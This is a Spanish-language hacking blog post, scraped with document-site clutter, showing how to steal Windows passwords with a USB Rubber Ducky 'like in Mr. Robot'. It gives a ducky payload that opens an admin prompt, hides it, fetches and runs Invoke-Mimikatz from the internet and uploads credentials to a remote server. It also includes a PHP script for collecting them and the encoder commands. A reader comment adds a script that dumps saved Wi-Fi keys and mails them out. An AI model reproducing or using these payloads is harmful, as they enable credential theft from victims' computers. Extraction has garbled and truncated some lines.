Hackeando Contraseñas Con El USB Rubber Ducky Como en MR - Robot - Hackwise

1/3/2017 HackeandocontraseasconelUSBRubberDuckycomoenMr.Robothackwise.
mx
Search and hit enter...
HACKWISE.MX
HACK THE WORLD
Hackeando contraseas con el USB Rubber Ducky como

en Mr.Robot
H A CK ING MR.EBOLA 16 SEPTIEMBRE, 2016 5 COMMENTS
Este episodio de HackWise se inspira en la serie de mr.robot al ver una pequea escena donde obtienen las
contraseas de una mquina Windows con tan solo 15 segundos de acceso fsico en la computadora de la vctima.
Utilizaremos el USB Rubber ducky creado por Darren Kitchen de Hak5 con un payload que utiliza la herramienta
Mimikatz para obtener los usuarios y contraseas almacenadas en el cach de la memoria RAM de la vctima.
No olvides Suscribirte a HackWise en youtubepara ms videos como este!!
http://www.hackwise.mx/hackeandocontrasenasconelusbrubberduckycomoenmrrobot/ 1/8
1/3/2017 HackeandocontraseasconelUSBRubberDuckycomoenMr.Robothackwise.mx
Hackeando como en MR.ROBOT con el USB Rubber Ducky - Hack...
Si todava no tienes tu servidor para montar el script te sugerimos adquieras uno ensinergia.ioutiliza el cdigo
hackwise para adquirir un 20% de descuento.
Este es el cdigo que utilizamos para el payload del rubber ducky.
1 REM Title: Invoke mimikatz and send creds to remote server

2 REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi
3 DELAY 1000
4 REM Open an admin command prompt
5 GUI r
6 DELAY 500
7 STRING powershell Start-Process cmd -Verb runAs
8 ENTER
9 DELAY 2000
10 ALT y
11 DELAY 1000
12 REM Obfuscate the command prompt
13 STRING mode con:cols=18 lines=1
14 ENTER
15 STRING color FE
16 ENTER
17 REM Download and execute Invoke Mimikatz then upload the results
18 STRING powershell "IEX (New-Object Net.WebClient).DownloadString('<a href="https://github.com/clymb3r
19 ENTER
20 DELAY 15000
21 REM Clear the Run history and exit
22 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explore
23 ENTER
24 STRING exit
25 ENTER
**Noolviden cambiar los siguientes enlaces para que se hospeden en su servidor:
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
http://hackwise.mx/h/rubber/Mimikatz/
Descarga el duck encoder desde: https://github.com/hak5darren/USB-Rubber-Ducky
Cdigo en PHP para capturar las contraseas y almacenarlas en nuestro servidor.
1 <?php
2 $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
3 file_put_contents($file, file_get_contents("php://input"));
4 ?>
Comandos para generar el payload inject.bin para el rubber ducky:
1 #Comando para generar el ducky script para computadoras en espaol

2 java -jar ./encoder.jar -i inject -o inject.bin -l es.properties
3
4 #Comando para generar el ducky script para computadoras en ingles
5 java -jar ./encoder.jar -i inject -o inject.bin
Contenido del archivoes.properties para poder generar ducky scripts para teclados en espaol.
1 // Author: Midnitesnake
2 // 01-11-2014
3 // LAYOUT_ESPANOL
4 // Based from Italian Keymap
5 // Thanks to Jaime.AlvarezdeAldecoa for patches
6 // Characters fixed by DragsterPS
7 // Fixes for Mac by Matto
8
9 KEY_NON_US_100 = 100
10
11 ASCII_20 = KEY_SPACE
12 // 32
13 ASCII_21 = KEY_1, MODIFIERKEY_SHIFT
14 // 33 !
16 // 34
17 ASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT
18 // 35 #
20 // 36 $
22 // 37 %
24 // 38 &
25 ASCII_27 = KEY_MINUS
26 // 39
28 // 40 (
30 // 41 )
31 ASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT
32 // 42 *
33 ASCII_2B = KEY_RIGHT_BRACE
34 // 43 +
35 ASCII_2C = KEY_COMMA
36 // 44 ,
37 ASCII_2D = KEY_SLASH
38 // 45
39 ASCII_2E = KEY_PERIOD
40 // 46 .
41 ASCII_2F = KEY_7, MODIFIERKEY_SHIFT
42 // 47 /
43 ASCII_30 = KEY_0
44 // 48 0
45 ASCII_31 = KEY_1
46 // 49 1
47 ASCII_32 = KEY_2
48 // 50 2
49 ASCII_33 = KEY_3
50 // 51 3
51 ASCII_34 = KEY_4
52 // 52 4
53 ASCII_35 = KEY_5
54 // 53 5
55 ASCII_36 = KEY_6
56 // 54 6
57 ASCII_37 = KEY_7
58 // 55 7
59 ASCII_38 = KEY_8
60 // 56 8
61 ASCII_39 = KEY_9
62 // 57 9
63 ASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT
64 // 58 :
65 ASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT
66 // 59 ;
67 ASCII_3C = KEY_TILDE
68 // 60 <
69 ASCII_3D = KEY_0, MODIFIERKEY_SHIFT
70 // 61 =
71 ASCII_3E = KEY_TILDE, MODIFIERKEY_SHIFT
72 // 62 >
73 ASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT
74 // 63 ?
75 ASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT
76 // 64 @
77 ASCII_41 = KEY_A, MODIFIERKEY_SHIFT
78 // 65 A
79 ASCII_42 = KEY_B, MODIFIERKEY_SHIFT
80 // 66 B
81 ASCII_43 = KEY_C, MODIFIERKEY_SHIFT
82 // 67 C
83 ASCII_44 = KEY_D, MODIFIERKEY_SHIFT
84 // 68 D
85 ASCII_45 = KEY_E, MODIFIERKEY_SHIFT
86 // 69 E
87 ASCII_46 = KEY_F, MODIFIERKEY_SHIFT
88 // 70 F
89 ASCII_47 = KEY_G, MODIFIERKEY_SHIFT
90 // 71 G
91 ASCII_48 = KEY_H, MODIFIERKEY_SHIFT
92 // 72 H
93 ASCII_49 = KEY_I, MODIFIERKEY_SHIFT
94 // 73 I
95 ASCII_4A = KEY_J, MODIFIERKEY_SHIFT
96 // 74 J
97 ASCII_4B = KEY_K, MODIFIERKEY_SHIFT
98 // 75 K
99 ASCII_4C = KEY_L, MODIFIERKEY_SHIFT
100 // 76 L
101 ASCII_4D = KEY_M, MODIFIERKEY_SHIFT
102 // 77 M
103 ASCII_4E = KEY_N, MODIFIERKEY_SHIFT
104 // 78 N
105 ASCII_4F = KEY_O, MODIFIERKEY_SHIFT
106 // 79 O
107 ASCII_50 = KEY_P, MODIFIERKEY_SHIFT
108 // 80 P
109 ASCII_51 = KEY_Q, MODIFIERKEY_SHIFT
110 // 81 Q
111 ASCII_52 = KEY_R, MODIFIERKEY_SHIFT
112 // 82 R
113 ASCII_53 = KEY_S, MODIFIERKEY_SHIFT
114 // 83 S
115 ASCII_54 = KEY_T, MODIFIERKEY_SHIFT
116 // 84 T
117 ASCII_55 = KEY_U, MODIFIERKEY_SHIFT
118 // 85 U
119 ASCII_56 = KEY_V, MODIFIERKEY_SHIFT
120 // 86 V
121 ASCII_57 = KEY_W, MODIFIERKEY_SHIFT
122 // 87 W
123 ASCII_58 = KEY_X, MODIFIERKEY_SHIFT
124 // 88 X
125 ASCII_59 = KEY_Y, MODIFIERKEY_SHIFT
126 // 89 Y
127 ASCII_5A = KEY_Z, MODIFIERKEY_SHIFT
128 // 90 Z
129 ASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT
130 // 91 [
131 ASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT
132 // 92 \
133
134 ASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT
135 // 93 ]
136 ASCII_5E = KEY_EQUAL, MODIFIERKEY_SHIFT
137 // 94 ^
138 ASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT
139 // 95 _
140
141 // ascii 60, 96: accento grave, non mappato
142 ASCII_61 = KEY_A
143 // 97 a
144 ASCII_62 = KEY_B
145 // 98 b
146 ASCII_63 = KEY_C
147 // 99 c
148 ASCII_64 = KEY_D
149 // 100 d
150 ASCII_65 = KEY_E
151 // 101 e
152 ASCII_66 = KEY_F
153 // 102 f
154 ASCII_67 = KEY_G
155 // 103 g
156 ASCII_68 = KEY_H
157 // 104 h
158 ASCII_69 = KEY_I
159 // 105 i
160 ASCII_6A = KEY_J
161 // 106 j
162 ASCII_6B = KEY_K
163 // 107 k
164 ASCII_6C = KEY_L
165 // 108 l
166 ASCII_6D = KEY_M
167 // 109 m
168 ASCII_6E = KEY_N
169 // 110 n
170 ASCII_6F = KEY_O
171 // 111 o
172 ASCII_70 = KEY_P
173 // 112 p
174 ASCII_71 = KEY_Q
175 // 113 q
176 ASCII_72 = KEY_R
177 // 114 r
178 ASCII_73 = KEY_S
179 // 115 s
180 ASCII_74 = KEY_T
181 // 116 t
182 ASCII_75 = KEY_U
183 // 117 u
184 ASCII_76 = KEY_V
185 // 118 v
186 ASCII_77 = KEY_W
187 // 119 w
188 ASCII_78 = KEY_X
189 // 120 x
190 ASCII_79 = KEY_Y
191 // 121 y
192 ASCII_7A = KEY_Z
193 // 122 z
194 ASCII_7B = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT
195 // 123 {
196 ASCII_7C = KEY_1, MODIFIERKEY_RIGHT_ALT
197 // 124 |
198 ASCII_7D = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT
199 // 125 }
200 ASCII_7E = KEY_SEMICOLON, MODIFIERKEY_RIGHT_ALT
201 // 126 ~
202 ISO_8859_1_BA = KEY_NON_US_100
203 // 127
204
205 // ascii 7E, 126: tilde, non mappato
206 ISO_8859_1_E0 = KEY_QUOTE
207 // 192 a grave
208 ISO_8859_1_E8 = KEY_LEFT_BRACE
209 // 232 e grave
210 ISO_8859_1_E9 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT
211 // 233 e acuta
212 ISO_8859_1_EC = KEY_EQUAL
213 // 236 i grave
214 ISO_8859_1_F2 = KEY_SEMICOLON
215 // 242 o grave
216 ISO_8859_1_F9 = KEY_BACKSLASH
217 // 249 u grave
218
219 ISO_8859_1_F1 = KEY_SEMICOLON
220 ISO_8859_1_D1 = KEY_SEMICOLON, MODIFIERKEY_SHIFT
Si tienes dudas, puedes dejar tus comentarios y con gusto te ayudar
Esto es todo por el video de esta semana, no olviden suscribirse a HackWise en youtube, hasta la prxima !
Posted in hacking, mr.robot, Rubber Ducky

5Comments hackwise.mx
1 Login
Recommend Share SortbyBest
Jointhediscussion
elprinss5monthsago
DondepuedoadquirirunUSBRubberDucky?
Reply Share
AngelbenSnchez5monthsago
SepuedehacerqueguardelosdatosenlamicroSDenlugardesubiraunservidor?
Sepuedeutilizarparasacarlascontraseasdealgnwifiqueestnalmacenadasenlapc?
MepuedesvenderunodeesosRubberDucky's,aunqueseausadoxd?
SaludosdeMxico!
Reply Share
RonnyAlexanderEras>AngelbenSnchez3monthsago
ssepuede,teadjuntoelscriptconelquepuedessacarlacontradelwifialcualest
conectadoyenviarteloalcorreo
WINDOWSd
REM>Opencmd
WINDOWSr
DELAY500
STRINGcmd
ENTER
DELAY1000
REM>GettingSSID
STRINGcd"%USERPROFILE%\Desktop"&for/f"tokens=2delims=:"%Ain('netsh
wlanshowinterface^|findstr"SSID"^|findstr/v"BSSID"')dosetA=%A
ENTER
STRINGnetshwlanshowprofilename=%A%key=clear>>Log.log
ENTER
REM>MailLog.txt
STRINGpowershell
ENTER
seemore
Reply Share
Armyzaelamonthago
Tengounadudasinoquierosubirloalservidoryloquequieroquesemegrabeenunblockde
notascomundentrodelamismamemoria,comoseriaelcodigo,yotracosahevistoquevaria
gentedejaguardadasuscontraseasdentrodesusbuscadoresdeinternetcomosergoogle
cromeomoxilafirefox,sepodrantomarobtenerestosaccesos,comoseriaelcodigoyque
recomendscionpuedeshacerparaevitarquealguenyaseaporbromaopormaldadcopietus
contraseas
Reply Share
EstebanOrtizamonthago
MepuedesvenderunodeesosRubberDucky's,aunqueseausadoDeArgentinaNeuquen
Reply Share
Reply Share
ALSOONHACKWISE.MX
QueesBitcoinyBitcoinGDL? Hackeandocualquiercorreoelectrnico
2comments6monthsago comoenMR.ROBOTHackWiseEP4
hackwiseHola!Laentradaesgratuitate 6comments5monthsago
recomiendovisiteshttp://hackergarage.mx/ WuilmerBolivarExcelentearticulodeverdad
muyinteresanteygraciasporcompartirloenel
asuntoconmepscrk.pynofuncionapuesen
Comoinvitarrapidamenteatodostus ComodesactivarPINGenlinuxutilizando
amigosaunfacebookpage icmpechoignoreallendebianoubuntu
1comment5monthsago 1comment5monthsago
OmarPerez graciasmuybuenoamigo FranciscoLunaHayalgninconvenienteal
desactivarlasrepuestasdeping?Saludos
Subscribe d AddDisqustoyoursiteAddDisqusAdd Privacy
YOUTUBE
PROUDLY HOSTED ON SINERGIA.IO

Hackeando Contraseñas Con El USB Rubber Ducky Como en MR - Robot - Hackwise

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Hackeando Contraseñas Con El USB Rubber Ducky Como en MR - Robot - Hackwise

Transféré par

Droits d'auteur :

Formats disponibles

1/3/2017 HackeandocontraseasconelUSBRubberDuckycomoenMr.Robothackwise.

Search and hit enter...

Hackeando contraseas con el USB Rubber Ducky como

No olvides Suscribirte a HackWise en youtubepara ms videos como este!!

Hackeando como en MR.ROBOT con el USB Rubber Ducky - Hack...

Este es el cdigo que utilizamos para el payload del rubber ducky.

1 REM Title: Invoke mimikatz and send creds to remote server

**Noolviden cambiar los siguientes enlaces para que se hospeden en su servidor:

Descarga el duck encoder desde: https://github.com/hak5darren/USB-Rubber-Ducky

Cdigo en PHP para capturar las contraseas y almacenarlas en nuestro servidor.

Comandos para generar el payload inject.bin para el rubber ducky:

1 #Comando para generar el ducky script para computadoras en espaol

Si tienes dudas, puedes dejar tus comentarios y con gusto te ayudar

Posted in hacking, mr.robot, Rubber Ducky

Recommend Share SortbyBest

Subscribe d AddDisqustoyoursiteAddDisqusAdd Privacy

PROUDLY HOSTED ON SINERGIA.IO

Vous aimerez peut-être aussi